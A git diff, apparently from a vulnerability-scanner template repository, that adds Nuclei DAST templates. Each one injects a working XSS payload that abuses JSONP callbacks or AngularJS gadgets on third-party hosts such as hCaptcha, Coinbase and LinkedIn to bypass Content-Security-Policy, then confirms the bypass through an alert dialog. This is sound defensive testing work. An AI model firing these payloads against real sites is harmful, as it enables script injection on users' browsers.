+          - "hatenaapis_bookmark_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..3e7e3c6cabb
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/hcaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: hcaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via hCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,hcaptcha
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://hcaptcha.com/1/api.js?onload=alert&render=explicit"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: hcaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "hcaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
new file mode 100644
index 00000000000..73c3eb981b2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/help-afterpay-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: help-afterpay-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Afterpay Help
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,afterpay
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://help.afterpay.com/sc/faye/?message=[{%22channel%22:%22%22}]&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: help_afterpay_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "help_afterpay_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
new file mode 100644
index 00000000000..b5a911fa093
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ib-adnxs-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ib-adnxs-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via AppNexus
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,adnxs
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ib.adnxs.com/async_usersync?cbfn=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ib_adnxs_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ib_adnxs_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
new file mode 100644
index 00000000000..5879e3da6c1
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-cloudflare-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-cloudflare-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Cloudflare Info
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,cloudflare
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://info.cloudflare.com//index.php/form/getForm?munchkinId=194-VVC-221&form=1077&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: info_cloudflare_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "info_cloudflare_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
new file mode 100644
index 00000000000..5bc836a2192
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/info-elastic-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: info-elastic-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Elastic Info
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,elastic
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://info.elastic.co/index.php/form/getForm?munchkinId=813-MAM-392&form=6196&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: info_elastic_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "info_elastic_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
new file mode 100644
index 00000000000..5fedee67ae4
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/inno-blob-core-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: inno-blob-core-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Azure Blob Storage
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,azure
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="//inno.blob.core.windows.net/new/libs/AngularJS/1.2.1/angular.min.js"></script><div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == \'window\'">{{ [1].reduce(value.alert, 1); }}</div></div></div></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: inno_blob_core_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "inno_blob_core_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
new file mode 100644
index 00000000000..af67727c77e
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/investor-coinbase-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: investor-coinbase-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Coinbase Investor
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,coinbase
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://investor.coinbase.com/feed/People.svc/GetPeopleList?callback=confirm(document.domain);"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: investor_coinbase_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "investor_coinbase_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
new file mode 100644
index 00000000000..b0ed307cdd2
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ipify-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipify-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Ipify API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ipify
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.ipify.org/?format=jsonp&callback=alert(1)//"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ipify_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ipify_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
new file mode 100644
index 00000000000..5f64443de19
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/ipinfo-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: ipinfo-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via IPInfo
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ipinfo
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ipinfo.io/?format=jsonp&callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: ipinfo_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "ipinfo_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
new file mode 100644
index 00000000000..5ddecf3ae24
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/itunes-apple-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: itunes-apple-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via iTunes
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,itunes
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://itunes.apple.com/se/rss/toppodcasts/json?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: itunes_apple_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "itunes_apple_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml
new file mode 100644
index 00000000000..06187ab405f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/jd-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: jd-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via JD API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,jd
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.m.jd.com/api?appid=x&functionId=x&jsonp=alert(document.domain)//"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: jd_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "jd_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml
new file mode 100644
index 00000000000..cd54da677fe
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/js-hcaptcha-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: js-hcaptcha-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via JS hCaptcha
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,hcaptcha
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://js.hcaptcha.com/1/api.js?onload=alert&render=explicit"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: js_hcaptcha_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "js_hcaptcha_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml
new file mode 100644
index 00000000000..b78798f895c
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/js-smb-ovoenergy-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: js-smb-ovoenergy-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via OVO Energy JS SMB
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,ovoenergy
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://js-smb.devices.ovoenergy.com/js-smb.min.js"></script><div ng-app><img src=x ng-on-error="window=$event.target.ownerDocument.defaultView;window.alert(window.origin);">'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: js_smb_ovoenergy_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "js_smb_ovoenergy_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml
new file mode 100644
index 00000000000..6bf53a6f9dd
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/kbcprod-service-now-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: kbcprod-service-now-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via ServiceNow KBCProd
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,servicenow
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<body ng-app ng-csp><script src="https://kbcprod.service-now.com/scripts/angular_includes_1.5.11.jsx"></script><input autofocus ng-focus="$event.composedPath()|orderBy:\'[].constructor.from([1],alert)\'"></body>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: kbcprod_service_now_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "kbcprod_service_now_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml
new file mode 100644
index 00000000000..898f7fda86f
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lghnh-mkt-prod1-adobe-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lghnh-mkt-prod1-adobe-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Adobe Campaign
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,adobe
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://lghnh-mkt-prod1.campaign.adobe.com/lgh/at_seg_list.jssp?callback=alert(1)-"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: lghnh_mkt_prod1_adobe_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "lghnh_mkt_prod1_adobe_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml
new file mode 100644
index 00000000000..cabb2a05c69
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/lijit-ap-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: lijit-ap-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Lijit AP
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,lijit
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://ap.lijit.com/rtb/bid?callback=alert&br={%22id%22:%221%22,%22site%22:{%22domain%22:%22x%22,%22page%22:%22x%22}}"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: lijit_ap_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "lijit_ap_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml
new file mode 100644
index 00000000000..fd1f40c4978
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/linkedin-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: linkedin-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via LinkedIn
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,linkedin
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://platform.linkedin.com/in.js?callback=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: linkedin_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "linkedin_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml
new file mode 100644
index 00000000000..2f191e34b34
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/links-disqus-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: links-disqus-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via Disqus Links
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,disqus
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="http://links.services.disqus.com/api/ping?format=jsonp&key=cfdfcf52dffd0a702a61bad27507376d&loc=http%3A%2F%2Fabcnews.go.com%2Fblogs%2Fhealth%2F2013%2F03%2F21%2F1-in-10-u-s-deaths-blamed-on-salt%2F&subId=2329827&v=1&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: links_disqus_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "links_disqus_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml
new file mode 100644
index 00000000000..a61064620a5
--- /dev/null
+++ b/dast/vulnerabilities/xss/csp/livechatinc-api-csp-xss.yaml
@@ -0,0 +1,55 @@
+id: livechatinc-api-csp-xss
+
+info:
+  name: Content-Security-Policy Bypass via LiveChatInc API
+  author: renniepak,DhiyaneshDK
+  severity: medium
+  reference:
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
+  metadata:
+    verified: true
+  tags: xss,csp-bypass,livechatinc
+
+http:
+  - pre-condition:
+      - type: dsl
+        dsl:
+          - 'method == "GET"'
+
+    payloads:
+      injection:
+        - '<script src="https://api.livechatinc.com/v3.6/customer/action/get_dynamic_configuration?license_id=x&url=x&channel_type=code&jsonp=alert"></script>'
+
+    fuzzing:
+      - part: query
+        type: replace
+        mode: single
+        fuzz:
+          - "{{url_encode(injection)}}"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "{{injection}}"
+        internal: true
+
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
+
+      - action: waitload
+
+      - action: waitdialog
+        name: livechatinc_api_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "livechatinc_api_csp_xss == true" 
\ No newline at end of file
diff --git a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml
similarity index 50%
rename from dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml
rename to dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml
index b649f234783..7ea006151c5 100644
--- a/dast/vulnerabilities/xss/csp/lpsnmedia-csp-xss.yaml
+++ b/dast/vulnerabilities/xss/csp/lpsnmedia-accdn-csp-xss.yaml
@@ -1,11 +1,11 @@
-id: lpsnmedia-csp-xss
+id: lpsnmedia-accdn-csp-xss
 
 info:
-  name: Content-Security-Policy Bypass via Lpsnmedia
-  author: DhiyaneshDK
-  severity: high
+  name: Content-Security-Policy Bypass via LPSN Media
+  author: renniepak,DhiyaneshDK
+  severity: medium
   reference:
-    - https://github.com/renniepak/CSPBypass/blob/0b4c8aee52497d660adce7a6d67311a73383818c/data.tsv#L6C7-L6C16
+    - https://github.com/renniepak/CSPBypass/blob/main/data.tsv
   metadata:
     verified: true
   tags: xss,csp-bypass,lpsnmedia
@@ -33,15 +33,23 @@ http:
         part: body
         words:
           - "{{injection}}"
+        internal: true
 
-      - type: word
-        part: content_type
-        words:
-          - "text/html"
+headless:
+  - steps:
+      - action: navigate
+        args:
+          url: "{{RootURL}}{{trim_prefix(http_matched, RootURL)}}"
 
-      - type: word
-        part: content_security_policy
-        words:
-          - "lpsnmedia.net"
-          - "script-src"
-        condition: and
\ No newline at end of file
+      - action: waitload
+
+      - action: waitdialog
+        name: lpsnmedia_accdn_csp_xss
+        args:
+          type: alert
+          timeout: 5000
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "lpsnmedia_accdn_csp_xss == true" 
\ No newline at end of file
